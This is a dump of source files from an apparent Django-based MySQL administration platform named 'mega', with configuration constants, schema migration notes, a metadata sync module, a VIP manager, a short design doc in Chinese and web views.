values\nDEFAULT_OS='Linux'\nDEFAULT_LEVEL=1\nDEFAULT_OWNER=1\nDEFAULT_DBTYPE='MySQL'\nDEFAULT_HATYPE='MS'\nDEFAULT_BUSINESS=1\nDEFAULT_DB_PORT=3306\nDEFAULT_PWD='123'\n#STAT\nSTAT_ONLINE=1\nSTAT_OFFLINE=0\n#TIME\nDATETIME_FORMATE=\"%Y-%m-%d %H:%M:%S\"\n\n#API \nERR_CODE_DEFAULT=None #INIT CODE :Nonmeaning\nERR_CODE_UNKOWN=-1 #UNKONW\nERR_CODE_SUCCESS=0 #NO ERROR OCCUR\nERR_CODE_INVALID=2\n\n#messages\nMSG_ERR_IP='Invalid IP !'\nMSG_ERR_PORT='Invalid PORT !'\nMSG_ERR_LEVEL='Invalid LEVEL !'\nMSG_ERR_NAME='Invalid NAME !'\nMSG_ERR_INSTANCE_EXITST='Instance already exists !'\nMSG_ERR_BUSINESS_EXITST='Business already exists !'\nMSG_ERR_DB_EXITST='Database already exists !'\nMSG_ERR_SERVER_EXITST='Server already exists !'\n\n#backup\nBACKUP_TOOL=['xtrabackup','mysqldump','mysqlbinlog','mydumper','rman','expdp','exp']\nBACKUP_TYPE=['full','increment','binlog','archivelog']\nBACKUP_LEVEL=['instance','db','table']\nBACKUP_CYCLE=['day','week','month']\nMIN_BACKUP_PERIOD=7\n#meta data\nOS=['Linux','Other']\nLEVEL=[1,2,3]\nDB_TYPE=['MySQL','Oracle','Other']\nHA_TYPE=['MS','None']\nVERSION=['5.1','5.5','5.6']\nFAILOVER=['ONLINE','ENFORCE']\nPLANT=['UNKOWN','亦庄','M6_jr','M6_wy']" }, { "alpha_fraction": 0.494047611951828, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 11.071428298950195, "blob_id": "4accd344e0bb2e85c038227975a891e77565ad36", "content_id": "a507ef5fdbb3bfb40df9a54d14df9997e1502ada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 28, "num_lines": 14, "path": "/src/mega_web/charts/home.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 18, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.home\n'''\n\n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6672587394714355, "alphanum_fraction": 0.7383067011833191, "avg_line_length": 30.27777862548828, "blob_id": "a37513442225b57fb2ff5361df5a288bb3f76e45", "content_id": "6e7d20eb6acb10d4b76b59dc2254e8348f1f8b2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1689, "license_type": "no_license", "max_line_length": 73, "num_lines": 54, "path": "/src/release/db_schema_his.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 2, 2014\n\n@author: xchliu\n\n@module:release.db_schema_his\n'''\n\n#2014-07-03\nalter table business add unique index idx_name(name);\nalter table `databases` add unique index idx_name(name);\nalter table instance add unique index idx_instance(ip,port);\nalter table server add unique index idx_ip(ip);\n\n\n#2014-07-03\nalter table instance add column version varchar(10) not null default '0';\nalter table task add column script varchar(50) not null default '';\n CREATE TABLE `document` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `file` varchar(100) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB;\n\n#2014-08-04\nalter table task add column stat int not null default 1;\nalter table task change target target varchar(200) not null default '';\nalter table task_log add column stat int not null default 0;\nalter table task_log change run_counts run_counts int not null default 0;\n\n#2014-0-15\nalter table instance add column slowlog int not null default 1;\n\n#2014-08-20\nalter table slowlog_info add hash_code varchar(50) not null after id;\nalter table slowlog_info add instance_id int not null after hash_code;\nalter table slowlog_info add stat int not null default 0;\n\n#2014-08-27\nCREATE TABLE `slowlog_opt` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `hash_code` varchar(64) NOT NULL,\n `opt_method` varchar(50) NOT NULL,\n `opt_explain` varchar(200) NOT NULL,\n `opt_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;\n\n#2014-09-25\nalter table server add column plant varchar(50) not null default '';\n\n2014-10-17\nalter table instance add cnf_file varchar(100) not null default '';\n" }, { "alpha_fraction": 0.47951310873031616, "alphanum_fraction": 0.48712095618247986, "avg_line_length": 38.32478713989258, "blob_id": "aab7632641a6e60b914c8159b7fc40fec82766c2", "content_id": "16ec80dd9de71dfd454348288598477aa2c76b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9201, "license_type": "no_license", "max_line_length": 178, "num_lines": 234, "path": "/src/mega_service/resource/sync_baseinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 17, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.sync_baseinfo\n'''\n\nfrom lib.utils import now\nfrom mega_web.resource.database_manage import DatabaseGet\nfrom mega_web.resource.database_manage import DatabaseManage\n\nfrom lib.logs import Logger\n\nMODEL='Service-resource'\nlog=Logger(MODEL).log()\n\nclass SyncBasic():\n '''\n sync the instance basic infomation with the given data\n base=['variables','table_status','mysql_user','db_name','base']+['timestamp']+['except']\n state=['status','slave_status']+['timestamp']+['except']\n \n instance:\"ip:port\"\n '''\n \n def __init__(self,instanceid,instance=None,tag_time=None):\n self.instance_id=instanceid\n if instance:\n self.instance_ip,self.instance_port=instance.split(':')\n else:\n self.instance_ip=self.instance_port=''\n if tag_time: \n self.tag_time=tag_time\n else:\n self.tag_time=now()\n self.q=PyMySQL()\n \n def sync_base(self,data,key):\n keys={'base':self.sync_instance,\n 'status':self.sync_status,\n 'variables':self.sync_variables,\n 'table_status':self.sync_table_info,\n 'mysql_user':self.sync_user_info,\n 'db_name':self.sync_db_info,\n 'slave_status':self.sync_slave_status\n }\n if key in keys:\n keys.get(key)(data)\n else:\n log.warn(\"unexpected key:%s .available keys:%s \" % (key,[key for key in keys])) \n \n def sync_instance(self,data=None):\n '''\n 'cnf': '/exportrvers/data/my3308/my.cnf'\n 'version': u'5.6.16'\n '''\n if not data:\n return False \n sql=\"update instance set version='%s',cnf_file='%s' where id=%s\" %(data.get('version'),data.get('cnf'),self.instance_id) \n self.q.execute(sql) \n return True\n \n def sync_variables(self,data=None):\n '''\n sync the variables \n '''\n for var in data:\n try:\n var_id=self.get_var_id(var)\n if var_id:\n sql=\"insert variables_his(instance_id,variable_id,value,insert_time) values(%s,%s,'%s','%s')\" \\\n % (self.instance_id,var_id,data.get(var,'null'),self.tag_time)\n# log.debug(sql)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save variables info failed :%s\" % ex)\n \n def sync_table_info(self,data=None):\n '''\n sync the table status \n {'ENGINE': 'InnoDB', 'TABLE_ROWS': '0', 'INDEX_LENGTH': '16384', 'DATA_LENGTH': '16384', 'db_name': 'dbchecksum', 'TABLE_NAME': '_dba_worksheet', 'TABLE_COMMENT': ''} \n '''\n for table in data:\n try:\n table_name=table.get('table_name','')\n if not table_name:\n continue\n #get database id\n db_name=table.get('db_name') \n db=DatabaseGet().get_database_unique(self.instance_id,db_name)\n if db:\n db_id=db[0].get('id')\n else: \n self.sync_db_info([db_name])\n db=DatabaseGet().get_database_unique(self.instance_id, db_name)\n if db:\n db_id=db[0].get('id')\n else:\n db_id=0\n index_size=table.get('index_length',0)\n data_size=table.get('data_length',0)\n table_rows=table.get('table_rows',0)\n engine=table.get('engine','') \n sql=\"insert into tables (instance_id,db_id,table_name,index_size,data_size,table_rows,engine,insert_time) \\\n values(%s,%s,'%s',%s,%s,%s,'%s','%s')\" %(self.instance_id,db_id,table_name,index_size,data_size,table_rows,engine,self.tag_time)\n result,ex=self.q.execute(sql)\n if not result:\n log.error(ex)\n except Exception as ex:\n log.error(\"Save table info failed :%s\" % ex)\n \n def sync_user_info(self,data=None):\n '''\n sync the user info\n {'[email protected]': \"GRANT SELECT, INSERT, LOCK TABLES ON `dbchecksum`.* TO 'dbchecksum'@'172.17.62.45'\",\n '[email protected]': \"GRANT ALL PRIVILEGES ON *.* TO 'zhanglei'@'172.17.62.38'} \n '''\n for user in data:\n _user,_host=user.split('@')\n try:\n sql='''insert mysql_user(instance_id,name,host,privilege,insert_time) values(%s,'%s','%s',\"%s\",'%s')''' \\\n % (self.instance_id,_user,_host,data.get(user,'null'),self.tag_time)\n #log.debug(sql)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save user info as %s@%s:%s' % (_user,_host,ex))\n except Exception as ex:\n log.error(\"Save user info failed :%s\" % ex) \n return\n \n def sync_db_info(self,data=None):\n '''\n sync the db info,add the database info if the db not found\n ['dbchecksum', 'dbchecksum_bak', 'mega', 'report']\n '''\n for db in data:\n try:\n db_id=DatabaseGet().get_database_unique(self.instance_id, db)\n if not db_id:\n result,msg=DatabaseManage({\"database_name\":db,\"database_ip\":self.instance_ip,\"database_port\":self.instance_port}).add_database()\n if result:\n log.info(\"Add database : %s\" % db)\n else:\n log.error(\"Failed to add database %s :%s\" % (db,msg))\n except Exception as ex:\n log.error(\"Save db info failed :%s\" % ex)\n \n def sync_status(self,data=None):\n '''\n sync the status\n '''\n for status in data:\n try:\n status_id=self.get_status_id(status)\n if status_id:\n sql=\"insert status_his(instance_id,status_id,value,insert_time) values(%s,%s,'%s','%s')\" \\\n % (self.instance_id,status_id,data.get(status,'null'),self.tag_time)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save status info failed :%s\" % ex)\n \n def sync_slave_status(self,data=None):\n '''\n sync the slave status\n '''\n for status in data: \n try:\n sql=\"insert into slave_status(instance_id,name,value,insert_time) values(%s,'%s','%s','%s')\" \\\n % (self.instance_id,status,data.get(status,'null',self.tag_time))\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save slave status info failed :%s\" % ex)\n\n def get_var_id(self,var):\n if not var:\n return None\n var=var.lower()\n #func to get the variable id\n def _get_id():\n sql=\"select id from variables where name='%s';\" % var\n var_id=self.q.fetchRow(sql)\n if var_id:\n return var_id[0]\n else:\n return None\n var_id=_get_id()\n #insert a new record if the variable does not exist\n if not var_id:\n sql=\"insert into variables(name) values('%s');\" % var\n result,ex=self.q.execute(sql)\n if result:\n var_id=_get_id()\n else: \n var_id=None \n log.error('Get variable id failed:%s %s' % (var,ex)) \n return var_id\n\n def get_status_id(self,status):\n if not status:\n return None\n #func to get the status id\n def _get_id():\n sql=\"select id from status where name='%s';\" % status\n status_id=self.q.fetchRow(sql)\n if status_id:\n return status_id[0]\n else:\n return None\n status_id=_get_id()\n #insert a new record if the variable does not exist\n if not status_id:\n sql=\"insert into status(name) values('%s');\" % status\n result,ex=self.q.execute(sql)\n if result:\n status_id=_get_id()\n else: \n status_id=None \n log.error('Get variable id failed:%s %s' % (status,ex)) \n return status_id\n\n \n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5254237055778503, "alphanum_fraction": 0.5310734510421753, "avg_line_length": 22.302631378173828, "blob_id": "6ce6ac9e234b6f61a159b95d3482303f52e9de59", "content_id": "02970155884a51d5e87a1cf6387c80433ddc586d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 94, "num_lines": 76, "path": "/src/mega_web/resource/vip_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 2, 2014\n\n@author: xchliu\n\n@module:mega_web.resource.vip_manage\n'''\n\nfrom mega_web.entity.models import Vip\nfrom conf.GlobalConf import MSG_ERR_IP\n\n\n\nclass VipManage():\n '''\n '''\n def __init__(self,request):\n self.vip=request.get('vip')\n self.domain=request.get('domain')\n self.type=request.get('type')\n self.stat=request.get('stat')\n self.plant=request.get('plant')\n self.id=request.get('id')\n \n def _data_check(self): \n if not self.vip :\n return False\n return True\n \n def add_vip(self):\n if not self._data_check():\n return False,MSG_ERR_IP\n v=Vip()\n v.vip=self.vip\n v.domain=self.domain\n v.type=self.type\n v.stat=self.stat\n v.plant=self.plant \n v.save()\n return True,''\n \n def mod_vip(self):\n if not self._data_check():\n return False,MSG_ERR_IP\n v=Vip.objects.get(id=self.id)\n v.vip=self.vip\n v.domain=self.domain\n v.type=self.type\n v.stat=self.stat\n v.plant=self.plant \n v.save()\n return True,''\n \n \nclass VipGet():\n '''\n '''\n def __init__(self):\n self.vip=Vip\n \n def get_vip_list(self,type=1,count=10):\n if count == 0:\n vip_list=self.vip.objects.filter(type=type).order_by('stat','vip').values()\n else:\n vip_list=self.vip.objects.filter(type=type).order_by('stat','vip')[count].values()\n return vip_list\n \n def get_vip_by_ip(self,vip):\n vip_list=self.vip.objects.filter(vip=vip).values()\n return vip_list\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6190476417541504, "avg_line_length": 5.599999904632568, "blob_id": "ba616782b7ef5415db0f6703ba153f587ad2213f", "content_id": "786ebce87854d2ff734a3adb4ef6643d18b69233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 28, "num_lines": 25, "path": "/docs/framework.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega 后台服务框架\n\n\n##主体逻辑\n* 监听请求\n* 主循环捕获定时任务\n* 任务推送\n\n##核心模块\n\n* 消息队列:multiprocessing queue\n\n* TCP server:\n\n* TCP 交互协议:\n\t\n\t数据包格式:\n\t\n\t返回错误码:\n\n* Worker\n\n* tracker\n\n* Daemon\n\t\n\n" }, { "alpha_fraction": 0.6484576463699341, "alphanum_fraction": 0.6504115462303162, "avg_line_length": 46.07044982910156, "blob_id": "cac5beb542cacc2856f9e3e3f97bbfba30e19a61", "content_id": "0788d3af5839cee2a32c735d2668506d3d55638e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24054, "license_type": "no_license", "max_line_length": 195, "num_lines": 511, "path": "/src/mega_web/views.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response,RequestContext,HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom resource import instance_manage,server_manage,business_manage,database_manage,resource_manage,user_manage,vip_manage\nfrom console.backup import Backup,Backup_Config\nfrom console.failover import FailoverGet,FailoverManage\nfrom lib import paginator\nfrom lib.meta_data import MetaData \nfrom mega_portal.file_manage import UploadFileForm\nfrom mega_web.entity.models import Document\nfrom mega_service.task import Task\nfrom mega_web.console.task import TaskManage \nfrom mega_web.admin.views import * \nfrom mega_web.tunning import slowlog\nfrom mega_web.monitor import alert_manage\n\nmeta_data=MetaData()\n\n@login_required\ndef home(request):\n slow_log=slowlog.get_chart_total()\n alert_list=alert_manage.get_alert_list()\n return render_to_response('home.html',{'slowlog':slow_log,'alert_list':alert_list},context_instance=RequestContext(request))\n \n@login_required\ndef monitor(request):\n if request.method=='POST':\n alert_id=request.POST.get('alert_id')\n alert_manage.update_alert(alert_id)\n alert_list=alert_manage.get_alert_list()\n return render_to_response('monitor.html',{'alert_list':alert_list},context_instance=RequestContext(request))\n\n@login_required\ndef console(request):\n if request.method==\"GET\":\n return render_to_response('console.html',context_instance=RequestContext(request))\n else:\n return render_to_response('console.html',context_instance=RequestContext(request))\n\ndef tunning(request):\n if request.method==\"GET\":\n return render_to_response('tunning.html',context_instance=RequestContext(request))\n else:\n return render_to_response('tunning.html',context_instance=RequestContext(request))\n\ndef portal(request):\n if request.method==\"GET\":\n return render_to_response('portal.html',context_instance=RequestContext(request))\n else:\n return render_to_response('portal.html',context_instance=RequestContext(request))\n\ndef fun(request):\n if request.method==\"GET\":\n return render_to_response('fun.html',context_instance=RequestContext(request))\n else:\n return render_to_response('fun.html',context_instance=RequestContext(request))\n\n\n\n#Sub sites\n##resource\ndef instance(request):\n page_num=1\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n instance_list_all=instance_manage.InstanceGet().get_instance_list(None,0)\n else:\n ip=request.POST.get(\"ip\")\n instance_list_all=instance_manage.InstanceGet().get_instance_list({\"ip\":ip},0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(instance_list_all, page_num)\n instance_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('instance.html',{'instance_list':instance_list,'page_range':page_range},context_instance=RequestContext(request))\n\ndef instance_add(request):\n msg=''\n if request.method==\"POST\":\n result,msg=instance_manage.InstanceManage(request.POST).add_instance()\n if result:\n msg='Sucess' \n return render_to_response('instance_add.html',{\"business_list\":meta_data.business_list(),\"owner_list\":meta_data.owner_list(),\n \"db_type\":meta_data.db_type,\"level\":meta_data.level,\n \"ha_type\":meta_data.ha_type,\"msg\":msg,\"version_list\":meta_data.version,\n \"instance_list\":meta_data.instance_list()\n },context_instance=RequestContext(request))\n\ndef instance_detail(request):\n inst=instance_manage.InstanceGet()\n if request.method==\"GET\":\n instance_id=request.GET.get('instance_id')\n instance=inst.get_instance(request.GET)\n else:\n instance_id=request.GET.get('instance_id')\n if request.POST.get(\"type\")==\"mod\":\n instance_manage.InstanceManage(request.POST).mod_instance() \n else:\n instance_manage.InstanceManage(request.POST).stat_instance()\n instance=inst.get_instance(request.POST)\n instance_base=inst.get_instance_base(instance_id)\n failover=FailoverGet().get_instance_failover(instance_id)\n #database=inst.get_instance_list({\"\":\"\"}, count, offset)\n return render_to_response('instance_detail.html',{\"instance\":instance,\"readonly\":\"true\",\"business_list\":meta_data.business_list(),\n \"owner_list\":meta_data.owner_list(),\n \"db_type\":meta_data.db_type,\"level\":meta_data.level,\n \"ha_type\":meta_data.ha_type,\"version_list\":meta_data.version,\n \"instance_list\":meta_data.instance_list(),\n \"instance_base\":instance_base,\n \"failover\":failover\n },context_instance=RequestContext(request))\n\n##server\ndef server(request):\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n server_list_all=server_manage.ServerGet().get_server_list(None, 0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(server_list_all, page_num)\n server_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('server.html',{\"server_list\":server_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n ip=request.POST.get('ip')\n if not ip :\n server=server_manage.ServerGet().get_server_list(None, 0)\n else:\n server=[]\n server_id =server_manage.ServerGet().get_server_by_ip(request.POST.get(\"ip\"))\n if server_id:\n server.append(server_manage.ServerGet().get_server_by_id(server_id))\n return render_to_response('server.html',{'server_list':server},context_instance=RequestContext(request))\ndef server_add(request):\n msg=''\n if request.method==\"POST\":\n result,msg=server_manage.ServerManage(request.POST).add_server()\n if result:\n msg='Sucess'\n return render_to_response('server_add.html',{'owner_list':meta_data.owner_list(),'os_list':meta_data.os,'msg':msg,\n 'plant_list':meta_data.plant_list},\n context_instance=RequestContext(request))\ndef server_detail(request):\n if request.method==\"GET\":\n server=server_manage.ServerGet().get_server(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n server_manage.ServerManage(request.POST).mod_server()\n server=server_manage.ServerGet().get_server(request.POST)\n else:\n server_manage.ServerManage(request.POST).stat_server()\n server=server_manage.ServerGet().get_server(request.POST)\n return render_to_response('server_detail.html',{\"server\":server,'plant_list':meta_data.plant_list,\n 'os_list':meta_data.os,'owner_list':meta_data.owner_list()\n },context_instance=RequestContext(request))\n \n#business\ndef business(request):\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n business_list_all=business_manage.BusinessGet().get_business_list(None, 100)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(business_list_all,page_num)\n business_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('business.html',{\"business_list\":business_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n business=request.POST.get('business')\n if not business:\n business_list=business_manage.BusinessGet().get_business_list(None, 10)\n else:\n business_list=business_manage.BusinessGet().get_business_list([business], 10)\n return render_to_response('business.html',{\"business_list\":business_list},context_instance=RequestContext(request))\ndef business_add(request):\n if request.method==\"GET\":\n return render_to_response('business_add.html',{'owner_list':meta_data.owner_list},context_instance=RequestContext(request))\n else:\n result,msg=business_manage.BusinessManage(request.POST).add_business()\n if result:\n msg='Success'\n return render_to_response('business_add.html',{\"msg\":msg,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\ndef business_detail(request):\n if request.method==\"GET\":\n business=business_manage.BusinessGet().get_business(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n business_manage.BusinessManage(request.POST).mod_business()\n business=business_manage.BusinessGet().get_business(request.POST)\n else:\n business_manage.BusinessManage(request.POST).stat_business()\n business=business_manage.BusinessGet().get_business(request.POST)\n return render_to_response('business_detail.html',{\"business\":business,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n\n#database\ndef database(request):\n page_range=[]\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n database_list_all=database_manage.DatabaseGet().get_database_list(None, 0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(database_list_all, page_num)\n database_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('database.html',{\"database_list\":database_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n ip=request.POST.get(\"ip\")\n database_list=database_manage.DatabaseGet().get_database_list({\"ip\":ip})\n if not ip :\n page_range=paginator.paginator(database_list)['page_range']\n return render_to_response('database.html',{\"database_list\":database_list,'page_range':page_range},context_instance=RequestContext(request))\ndef database_add(request):\n instance_list=instance_manage.InstanceGet().get_instance_list(None,count=0) #.values(\"id\",\"ip\",\"port\")\n if request.method==\"GET\":\n return render_to_response('database_add.html',{\"instance_list\":instance_list,\"business_list\":meta_data.business_list(),\n \"level\":meta_data.level,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n else:\n (result,msg)=database_manage.DatabaseManage(request.POST).add_database()\n return render_to_response('database_add.html',{\"msg\":msg,\"instance_list\":instance_list,\"business_list\":meta_data.business_list,\n \"level\":meta_data.level,'owner_list':meta_data.owner_list},context_instance=RequestContext(request))\ndef database_detail(request):\n if request.method==\"GET\": \n database=database_manage.DatabaseGet().get_database(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n database_manage.DatabaseManage(request.POST).mod_database()\n database=database_manage.DatabaseGet().get_database(request.POST)\n else:\n database_manage.DatabaseManage(request.POST).stat_database()\n database=database_manage.DatabaseGet().get_database(request.POST)\n return render_to_response('database_detail.html',{\"database\":database,\n \"instance_list\":meta_data.instance_list(),\"business_list\":meta_data.business_list(),\n \"level\":meta_data.level,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n\n#user\ndef user(request):\n if request.method==\"GET\":\n user_list=user_manage.UserGet().get_user_list('')\n return render_to_response('user.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n else:\n user=request.POST.get(\"user\")\n user_list=user_manage.UserGet().get_user_list({\"name\":user})\n return render_to_response('user.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n\ndef user_add(request):\n if request.method==\"GET\":\n user_list=user_manage.UserGet().get_user_list('')\n return render_to_response('user_add.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n else:\n result,msg=user_manage.UserManage(request.POST).user_add()\n return render_to_response('user_add.html',{\"msg\":msg},context_instance=RequestContext(request))\n\n\ndef user_detail(request):\n msg=''\n if request.method==\"POST\":\n user_id=request.POST.get('user_id')\n if request.POST.get(\"type\")=='mod':\n result,msg=user_manage.UserManage(request.POST).user_mod()\n else:\n result,msg=user_manage.UserManage(request.POST).user_stat() \n else:\n user_id=request.GET.get('user_id')\n user=user_manage.UserGet().get_user_by_id(user_id)\n return render_to_response('user_detail.html',{\"user\":user,\"msg\":msg,},context_instance=RequestContext(request))\n\n#vip\ndef vip(request):\n msg=''\n if request.method==\"GET\":\n vip=request.GET.get('vip')\n if vip:\n vip_list=vip_manage.VipGet().get_vip_by_ip(vip)\n else:\n vip_list=meta_data.vip_list()\n else:\n if request.POST.get('action') == 'add': \n result,msg=vip_manage.VipManage(request.POST).add_vip()\n else:\n result,msg=vip_manage.VipManage(request.POST).mod_vip()\n vip_list=meta_data.vip_list() \n return render_to_response('vip.html',{\"msg\":msg,'vip_list':vip_list,'plant_list':meta_data.plant_list},context_instance=RequestContext(request))\n\n#backup\n\ndef backup(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n backup_list_all=Backup().get_newest_backup_list()\n else:\n page=request.POST.get('page')\n ip=request.POST.get('ip')\n backup_list_all=Backup().get_newest_backup_list(ip=ip)\n if not page:\n page=1\n page_data=paginator.paginator(backup_list_all, page)\n page_range=page_data.get('page_range')\n backup_list=page_data.get('page_data')\n today_static=Backup().get_today_statics()\n return render_to_response('backup.html',{\"backup_list_all\":backup_list,\"page_range\":page_range,\"today_static\":today_static},context_instance=RequestContext(request))\n\ndef backup_config(request):\n backup_type=Backup_Config().backup_type\n backup_tool=Backup_Config().backup_tool\n backup_level=Backup_Config().backup_level\n backup_cycle=Backup_Config().backup_cycle\n backup={\"stat\":'ON'}\n if request.method==\"GET\":\n ip=request.GET.get(\"ip\")\n port=request.GET.get(\"port\")\n instance={\"ip\":ip,\"port\":port}\n config_list,msg=Backup().get_config_by_instance(ip,port)\n backup[\"msg\"]=msg\n return render_to_response('backup_config.html',{\"config_list\":config_list,\"instance\":instance,\"backup_tool\":backup_tool,\n \"backup_type\":backup_type,\"backup_level\":backup_level,\"backup_cycle\":backup_cycle,\n \"backup\":backup},context_instance=RequestContext(request))\n else:\n ip=request.POST.get(\"ip\")\n port=request.POST.get(\"port\")\n instance={\"ip\":ip,\"port\":port}\n config_list,msg=Backup().get_config_by_instance(ip,port)\n backup[\"msg\"]=msg\n result=Backup_Config().config_deliver(request.POST)\n return render_to_response('backup_config.html',{\"instance\":instance,\"config_list\":config_list,\"backup_tool\":backup_tool,\n \"backup_type\":backup_type,\"backup_level\":backup_level,\"backup_cycle\":backup_cycle},context_instance=RequestContext(request))\ndef backup_config_list(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n backup_list_all=Backup().get_config_list()\n else:\n page=request.POST.get('page')\n ip=request.POST.get('ip')\n backup_list_all=Backup().get_config_list(ip=ip)\n if not page:\n page=1\n page_data=paginator.paginator(backup_list_all, page)\n page_range=page_data.get('page_range')\n backup_list=page_data.get('page_data')\n return render_to_response('backup_config_list.html',{\"backup_list_all\":backup_list,\"page_range\":page_range},context_instance=RequestContext(request))\n\ndef document(request):\n if request.method==\"GET\":\n form=UploadFileForm()\n else:\n form=UploadFileForm(request.POST,request.FILES)\n if form.is_valid():\n _new_doc=Document(file=request.FILES['file'])\n _new_doc.save()\n documents=Document.objects.all()\n \n return render_to_response('document.html',{'form':form ,'documents':documents},context_instance=RequestContext(request))\n\ndef task(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n task_list=Task().get_task_list(-1)\n if not page:\n page=1\n page_data=paginator.paginator(task_list, page)\n page_range=page_data.get('page_range')\n task_list=page_data.get('page_data')\n return render_to_response('task.html',{\"task_list\":task_list,\"page_range\":page_range},context_instance=RequestContext(request))\n\ndef task_add(request):\n msg=''\n if request.method == \"POST\" :\n result,msg=TaskManage(request.POST).task_add()\n return render_to_response('task_add.html',{'owner_list':meta_data.owner_list(),'msg':msg},context_instance=RequestContext(request))\n\ndef task_detail(request):\n msg=''\n if request.method=='GET':\n task=TaskManage(request.GET).get_task_by_id()\n else:\n _task=TaskManage(request.POST)\n result,msg=_task.task_mod()\n task=_task.get_task_by_id()\n return render_to_response('task_detail.html',{'task':task,'owner_list':meta_data.owner_list(),'msg':msg},context_instance=RequestContext(request))\n\n#slow log\ndef slowlog_config(request):\n if request.method=='GET':\n result=instance_manage.InstanceManage(request.GET).stat_instance_slowlog()\n return render_to_response('slowlog_config.html',{'instance_list':meta_data.instance_list()},context_instance=RequestContext(request))\n\ndef slowlog_report(request):\n if request.method=='GET':\n begin=end=None\n else:\n begin=request.POST.get('begin_date')\n end=request.POST.get('end_date')\n groupbyinstance=slowlog.get_chart_groupbyinstance(begin,end)\n total=slowlog.get_chart_total(None,begin,end)\n groupbytime=slowlog.get_chart_groupbytime(begin,end)\n topsql=slowlog.get_chart_topsql(begin,end)\n return render_to_response('slowlog_report.html',{'groupbyinstance':groupbyinstance,'total':total,'topsql':topsql,'groupbytime':groupbytime},\n context_instance=RequestContext(request))\n\ndef slowlog_sql(request):\n msg=''\n if request.method=='GET':\n hash_code=request.GET.get('hash_code')\n else:\n hash_code=request.POST.get('hash_code')\n msg=slowlog.add_opt_record(request.POST)\n groupbyinstance=slowlog.get_sql_hosts(hash_code)\n total=slowlog.get_sql_time(hash_code)\n sql_info=slowlog.get_sql_info(hash_code)\n opt_record=slowlog.get_opt_record(hash_code)\n return render_to_response('slowlog_report_sql.html',{'groupbyinstance':groupbyinstance,'total':total,'sql_info':sql_info,'msg':msg,\"opt_record\":opt_record},\n context_instance=RequestContext(request))\n\ndef slowlog_instance(request):\n if request.method=='GET':\n begin=end=None\n instance_id=request.GET.get('instance_id',1)\n else:\n begin=request.POST.get('begin_date')\n end=request.POST.get('end_date')\n instance_id=request.POST.get('instance_id',1)\n \n #total=slowlog.get_chart_total(instance_id,begin,end)\n total=slowlog.get_chart_total(instance_id)\n 